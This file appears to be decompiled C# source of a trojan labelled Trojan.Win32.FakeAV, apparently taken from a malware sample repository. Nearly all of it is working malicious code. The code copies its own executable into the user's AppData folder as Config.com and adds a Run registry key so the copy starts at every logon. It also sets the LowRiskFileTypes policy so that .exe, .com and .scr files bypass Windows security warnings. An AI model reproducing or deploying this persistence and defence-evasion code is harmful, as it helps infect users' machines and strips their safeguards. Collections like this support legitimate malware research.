MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/pharmnova.cs
2022-08-18 06:28:56 -05:00

36 lines
1.5 KiB
C#

// Decompiled with JetBrains decompiler
// Type: Pharming_V4.pharmnova
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using Pharming_V4.My;
using System;
using System.Reflection;
namespace Pharming_V4
{
[StandardModule]
internal sealed class pharmnova
{
public static void pharmnova()
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
try
{
MyProject.Computer.FileSystem.CopyFile(Assembly.GetExecutingAssembly().Location, folderPath + "\\telefx\\Config.com", true);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Config", (object) ("\"" + folderPath + "\\telefx\\Config.com\" -autorun"));
Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations");
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations", true).SetValue("LowRiskFileTypes", (object) ".exe;.com;.scr");
}
}
}